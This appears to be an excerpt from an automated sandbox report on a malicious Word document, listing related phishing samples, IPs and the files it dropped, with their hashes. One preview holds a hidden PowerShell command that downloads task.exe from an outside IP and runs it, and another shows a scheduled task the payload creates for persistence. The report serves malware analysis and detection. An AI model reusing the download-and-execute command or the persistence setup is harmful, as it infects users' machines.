us2.smtp.mailhostbox.com | Swift_HSBC_0099087645 xOJ4XUjdMZ40k5Hpdf.exe | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | Swift_HSBC_0099087645PDF.exe | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | P0_636732672772_RFQ.exe | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | rTyPU1zmY5PsyNl.exe | malicious | 208.91.199.223
us2.smtp.mailhostbox.com | DOCUMENTS.exe | malicious | 208.91.199.223
us2.smtp.mailhostbox.com | Purchase Order PO#7701.exe | malicious | 208.91.198.143
us2.smtp.mailhostbox.com | STATEMENT OF ACCOUNT.xlsx | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | XsFFv27rls.exe | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | TransactionSummary_22-11-2021.exe | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | TNT E-Invoice No 11073490.exe | malicious | 208.91.198.143
us2.smtp.mailhostbox.com | E invoice.exe | malicious | 208.91.198.143
us2.smtp.mailhostbox.com | TOP QUOTATION RFQ 2021.exe | malicious | 208.91.199.223
us2.smtp.mailhostbox.com | (KOREA SHIPPING - KLCSM).exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | Bill of lading.exe | malicious | 208.91.199.225

                                                                                                                ASN

Match | Associated Sample Name / URL | Detection | Context
PUBLIC-DOMAIN-REGISTRYUS | MT_1O1_SWIFt.doc | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Reconfirm The Details.doc | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Document.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Swift Copy TT.doc | malicious | 207.174.212.140
PUBLIC-DOMAIN-REGISTRYUS | MT_101_SWIFT.doc | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | ORDER INQUIRY-PVP-SP-2021-58.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | DOC221121.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Swift_HSBC_0099087645PDF.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | P0_636732672772_RFQ.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | DOCUMENTS.exe | malicious | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | Activation Online Mail.htm | malicious | 103.50.163.110
PUBLIC-DOMAIN-REGISTRYUS | Purchase Order PO#7701.exe | malicious | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | STATEMENT OF ACCOUNT.xlsx | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | XsFFv27rls.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | TNT E-Invoice No 11073490.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | SWIFT COPY.exe | malicious | 199.79.62.99
PUBLIC-DOMAIN-REGISTRYUS | E invoice.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | TOP QUOTATION RFQ 2021.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | TOwYernH3DhfPER.exe | malicious | 208.91.199.181
PUBLIC-DOMAIN-REGISTRYUS | Activation Online Mail.htm | malicious | 103.50.163.110
PUBLIC-DOMAIN-REGISTRYUS | MT_1O1_SWIFt.doc | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Reconfirm The Details.doc | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Document.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Swift Copy TT.doc | malicious | 207.174.212.140
PUBLIC-DOMAIN-REGISTRYUS | MT_101_SWIFT.doc | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | ORDER INQUIRY-PVP-SP-2021-58.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | DOC221121.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Swift_HSBC_0099087645PDF.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | P0_636732672772_RFQ.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | DOCUMENTS.exe | malicious | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | Activation Online Mail.htm | malicious | 103.50.163.110
PUBLIC-DOMAIN-REGISTRYUS | Purchase Order PO#7701.exe | malicious | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | STATEMENT OF ACCOUNT.xlsx | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | XsFFv27rls.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | TNT E-Invoice No 11073490.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | SWIFT COPY.exe | malicious | 199.79.62.99
PUBLIC-DOMAIN-REGISTRYUS | E invoice.exe | malicious | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | TOP QUOTATION RFQ 2021.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | TOwYernH3DhfPER.exe | malicious | 208.91.199.181
                                                                                                                Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                                • 103.50.163.110
                                                                                                                EONIX-COMMUNICATIONS-ASBLOCK-62904USMT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                Reconfirm The Details.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                arm6-20211124-0649Get hashmaliciousBrowse
                                                                                                                • 170.130.75.226
                                                                                                                K7hNSg5hRL.exeGet hashmaliciousBrowse
                                                                                                                • 170.130.13.186
                                                                                                                MT 1O1.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                PO 635.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                DHL_119040 al#U0131#U015f irsaliyesi belgesi,pdf.exeGet hashmaliciousBrowse
                                                                                                                • 208.89.219.70
                                                                                                                PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                                                                                • 173.232.62.19
                                                                                                                1687HM2021.xlsx.exeGet hashmaliciousBrowse
                                                                                                                • 173.213.66.89
                                                                                                                BwJriVGrt5.exeGet hashmaliciousBrowse
                                                                                                                • 170.130.10.102
                                                                                                                PURCHASE ORDER.docGet hashmaliciousBrowse
                                                                                                                • 173.232.204.89
                                                                                                                001100202021.exeGet hashmaliciousBrowse
                                                                                                                • 23.90.37.72
                                                                                                                bnmf4567.exeGet hashmaliciousBrowse
                                                                                                                • 50.3.41.145
                                                                                                                Hack.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.244.186
                                                                                                                setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                • 107.158.11.57
                                                                                                                ixijzt2mxt.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.201.42
                                                                                                                GTA5TerrorMM.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.244.186
                                                                                                                FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.201.42
                                                                                                                Injector.exeGet hashmaliciousBrowse
                                                                                                                • 104.140.201.42

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\SzfukVRF.exe | MT_1O1_SWIFt.doc | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe | MT_1O1_SWIFt.doc | malicious
C:\Users\user\AppData\Roaming\task.exe | MT_1O1_SWIFt.doc | malicious

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):504832
                                                                                                                      Entropy (8bit):7.875034070984988
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
                                                                                                                      MD5:F65B0793251364C03D06E8E7134FC21B
                                                                                                                      SHA1:7BC80E89BBC7C10B974462E748849F9056D20D4A
                                                                                                                      SHA-256:A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
                                                                                                                      SHA-512:BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
                                                                                                                      Malicious:true
Joe Sandbox View: Filename: MT_1O1_SWIFt.doc, Detection: malicious
                                                                                                                      Reputation:low
                                                                                                                      IE Cache URL:http://173.232.204.89/task.exe
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2CAE3F9.wmf
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3712
                                                                                                                      Entropy (8bit):5.037816902563746
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Qk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:Qk7Awam8fI4s0f5ap3
                                                                                                                      MD5:7E855AA0ECA27E6E8E2A2F8AE2A48F33
                                                                                                                      SHA1:C309D1A169059EA57D6AA0A4D5FA4B00B83C67C7
                                                                                                                      SHA-256:8E612AA9E10E31E5D64AB9FEC4E7FFBED91C8C47620CEED5C5460750EB5E4C3B
                                                                                                                      SHA-512:AFEBD07201DDEE57140E6444D62DA8BCC53D0F0F2C62951162E762136979A114DAD92B7652D6A3C9214A20265D04B3FE5BFA70870ED1AFD96BD5F8A837FEF27C
                                                                                                                      Malicious:false
                                                                                                                      Preview: ......@.....!.....................5...........................Segoe UI....C.-.....@..........#....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD7EADD8.png
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:370 sysV pure executable
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):262160
                                                                                                                      Entropy (8bit):0.24537807839389073
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:xcrH7XNEN+N8//zb+H2fffFilJBzkNDDN+N8//zb+H2fffFuExB+3NhDN+N8/mLk:2zrNVE9GJ6NuE9u/cwz1J6NuE9
                                                                                                                      MD5:ABBD59B3E4B072E6702F1F910CAA05D6
                                                                                                                      SHA1:9D8AD507D0339D217561F0A8E69607D38545D6BB
                                                                                                                      SHA-256:4C0541BD1C3B054F9FB790A3E7FC898908B2D9104FF61A09500A9CA1C3291870
                                                                                                                      SHA-512:7B17AACAEF606D51E448E37065D1EEF1C261239E7AE4A5F9B2A5FB0289A6C8B101B3A5C37055699FDA4536D45AD321989302E864F864EFB9E9DBE1B33E4B3F39
                                                                                                                      Malicious:false
                                                                                                                      Preview: X.:.....p.j.....o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e.". .-.N.o.P. .-.s.t.a. .-.N.o.n.I. .-.W. .H.i.d.d.e.n. .-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .b.y.p.a.s.s. .-.N.o.L.o.g.o. .-.c.o.m.m.a.n.d. .".(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.'.h.t.t.P.:././.1.7.3...2.3.2...2.0.4...8.9./.t.a.s.k...e.x.e.'.,.'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .'.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.t.a.s.k...e.x.e.'.".............l.....0.k.......................................X.....................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{359899CB-2F00-4180-B83B-336B1EE05F4F}.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):214016
                                                                                                                      Entropy (8bit):4.757014234408119
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:tBabzacasapa2H/Na7rRlBabzacasapa2H/Na7pmV:mbzacasapa2HY7Abzacasapa2HY7
                                                                                                                      MD5:B33010290F6ED0C12253AFD2B83EE458
                                                                                                                      SHA1:E492CAD440EFC9C93553D95A158ED84A0656F2AB
                                                                                                                      SHA-256:54147F6E9949D14672892FDC5104A02A1E41DB662D39EDC135FC12FB24C91C10
                                                                                                                      SHA-512:9C1FB272563766455908B1B41E84B4A386DDE1AF25B867103B3E4D52CA15CA1EA4B7008DB069313431CC35C40F1383BFACB0E10F21F00544822527C47D4E6135
                                                                                                                      Malicious:false
                                                                                                                      Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4D8A2392-564C-4DB2-903D-17A8A736109B}.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):44098
                                                                                                                      Entropy (8bit):2.879594246936239
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:dq/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:aFia0Dqeb0nstw29rVzWSgm58F
                                                                                                                      MD5:7C0A9B9DA73BA081A06703CECE345DFF
                                                                                                                      SHA1:84823768F9E22131B15777CB4196A15FEEF9ADCA
                                                                                                                      SHA-256:27748FD8FFDB4A4163016E5DA937315BD05E77357931B45BD1E1EC58C0C20A48
                                                                                                                      SHA-512:79969B8A67392228AE3998F1C6AF17F393EFD89CAF90D5D47426498E93EEED996DEB3AE150BCB82225058E8DD2F5F80D6FB9FC98198E0DF0E869AA6B2DA507F7
                                                                                                                      Malicious:false
                                                                                                                      Preview: c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.........................................................................................................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.RJe...CJ..OJ..QJ..U..^J..aJ.
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{527B5D4D-3E6F-42BD-8FFA-6C52D5EDBEDF}.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1024
                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                      Malicious:false
                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{88FEB9FD-DBED-46CA-AEE6-1702A6B1006D}.tmp
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1536
                                                                                                                      Entropy (8bit):1.3573187972516119
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbl:IiiiiiiiiifdLloZQc8++lsJe1Mzq
                                                                                                                      MD5:B05EDE552A5E4F0375E4000DDD8804EB
                                                                                                                      SHA1:AFAA26BF1745F8425FB3B92CDF455B64C1030455
                                                                                                                      SHA-256:458E1D3CDD8D4D59A90D24A07CBFAEFEE7A13A0D793E0F173F080F79AE178BE7
                                                                                                                      SHA-512:46FE16339641E02940C4F8B1DBF3EE89B6CB2C5B6236AB5BB74B4F5DD3AE9979CB6820AA7A0DDB83952FA31CA5D08EB1FD2C3351C7DACC9F358D210B168BD1B6
                                                                                                                      Malicious:false
                                                                                                                      Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):97514
                                                                                                                      Entropy (8bit):4.489544623132179
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VBabzacasapa2lGWOlARldNVYwUn7ZwPW1ir:VBabzacasapa2H/Na7M
                                                                                                                      MD5:EB599CC95ACB0DA0DAFFE2C49E6CA94C
                                                                                                                      SHA1:581089674A9F472221C002E613C5B1830ACC9D1D
                                                                                                                      SHA-256:936F1E2D5FB8C9CD1535E4092D28A989929BAFD0EFDF2A555D2AC5CF5612BFF7
                                                                                                                      SHA-512:7A378AA05AABFF3FCB305956BA7600875376B33477D654984AE1D9AC49D27BB0AFEDB5BE38C17DDAC754DDEE95CCD57F23336BBE3FD4ABC53477291E71971E27
                                                                                                                      Malicious:true
                                                                                                                      Preview: .............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:gAWY3n:qY3n
                                                                                                                      MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                      SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                      SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                      SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                      Malicious:false
                                                                                                                      Preview: [ZoneTransfer]..ZoneId=3..
                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
                                                                                                                      Process:C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1574
                                                                                                                      Entropy (8bit):5.11268735911116
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTDv
                                                                                                                      MD5:2FB2F595006AB549A4C00CC852A1F691
                                                                                                                      SHA1:9B8CFA7A4D43ADF4C3ADEA923AE5AFDDE3A40314
                                                                                                                      SHA-256:5466C2D681BB5F3A6B50D13FD153C920D963FE658574BBD123371BC02FAC0E86
                                                                                                                      SHA-512:76720B62C1F421B2D88E38540560033CE47D60D37AA5E22AEC2805A1CD78E3CE0EB716CF9770D00DC128043D6514EA9329B0C88FB9D6FDCF135151658D00BC11
                                                                                                                      Malicious:true
                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PAGO DEL SALDO.LNK
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:21:13 2021, length=393199, window=hide
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1034
                                                                                                                      Entropy (8bit):4.557967550864718
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:8MyTSp1tgXg/XAlCPCHaXjByB/AVtX+W3MTxEUR9LicvbS2wIyR9BDtZ3YilMMEz:8My2/XTTc+bd/e52Dv3qg87l
                                                                                                                      MD5:9A01376D1343F9F324D36215EA07B616
                                                                                                                      SHA1:6AA3137B198FAE3A9868E48F28B4D4816A5ED0DF
                                                                                                                      SHA-256:D2CF4B190147E17EFEDF7545BAE918424531159EFC0E083FF28B15BC0034B6A9
                                                                                                                      SHA-512:7FCD858C9DB695DCA4E1D7E5F4AE9CEC2CA0629EBC637E2B154ECFEAB9EB1B9302D333DF5F2C7ACD40FBE2EA26548277FBA414D328EB99F3A24CA43DBEED588C
                                                                                                                      Malicious:false
                                                                                                                      Preview: L..................F.... ....f>....f>......Hl................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....zS.. .PAGODE~1.DOC..R.......S...S..*.........................P.A.G.O. .D.E.L. .S.A.L.D.O...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\PAGO DEL SALDO.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.A.G.O. .D.E.L. .S.A.L.D.O...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_....3N...W...9..g............[D_
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):79
                                                                                                                      Entropy (8bit):4.741754287211816
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:bDuMJlt+A+rXCmX1uih+rXCv:bCm+drX0i8rXs
                                                                                                                      MD5:D5282C6D9AB64FE90D11B66486B8CE47
                                                                                                                      SHA1:8CECDE758E0C31861FB1ADE725D2FB28F9900385
                                                                                                                      SHA-256:FFA65D7871728B70C7EB183FB39BBEDE6EEFA7502FFEBA838276596DA8D429D3
                                                                                                                      SHA-512:082476690242A0145A0B81FD3EFF16126ABB09F0B02FDFFBAADB29670497E7D3C82232810FD5DD657CE6943738E7ADA77CFE3D909BA26C2D9AEBD6DB63468994
                                                                                                                      Malicious:false
                                                                                                                      Preview: [folders]..Templates.LNK=0..PAGO DEL SALDO.LNK=0..[doc]..PAGO DEL SALDO.LNK=0..
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):162
                                                                                                                      Entropy (8bit):2.5038355507075254
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                                      Malicious:false
                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2
                                                                                                                      Entropy (8bit):1.0
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                      Malicious:false
                                                                                                                      Preview: ..
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0VT7C41M2L4V6JEPSUND.temp
